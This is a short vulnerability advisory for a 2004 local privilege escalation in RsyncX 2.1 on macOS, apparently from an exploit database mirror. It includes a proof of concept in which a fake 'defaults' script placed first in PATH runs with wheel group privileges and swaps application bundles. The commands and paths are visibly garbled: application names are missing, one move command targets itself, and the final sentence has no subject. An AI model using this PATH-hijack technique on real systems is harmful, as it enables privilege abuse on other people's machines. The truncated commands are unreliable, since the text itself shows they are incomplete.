MacOSXLabs RsyncX 2.1 - Local Privilege Escalation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054630 漏洞类型
发布时间 2004-09-17 更新时间 2004-09-17
漏洞平台 OSX CVSS评分 N/A

It is reported that RsyncX is prone to a local privilege escalation vulnerability.

RsyncX is installed setuid root and setgid wheel. It is reported that RsyncX drops root privileges properly but fails to drop setgid wheel privileges before executing a third party binary. 

A local attacker may exploit this vulnerability to execute arbitrary code with group wheel privileges.

The following example is available:

First, make a backup of System\

Create an executable file ~/bin/defaults with contents of:

mv "/Applications/System" "/Applications/System"
cp -r "/Applications/" "/Applications/System"

Then run RsyncX with ~/bin in your path:

PATH=~/bin:$PATH /Applications/Utilities/

Click on System Preferences, and is now a calculator.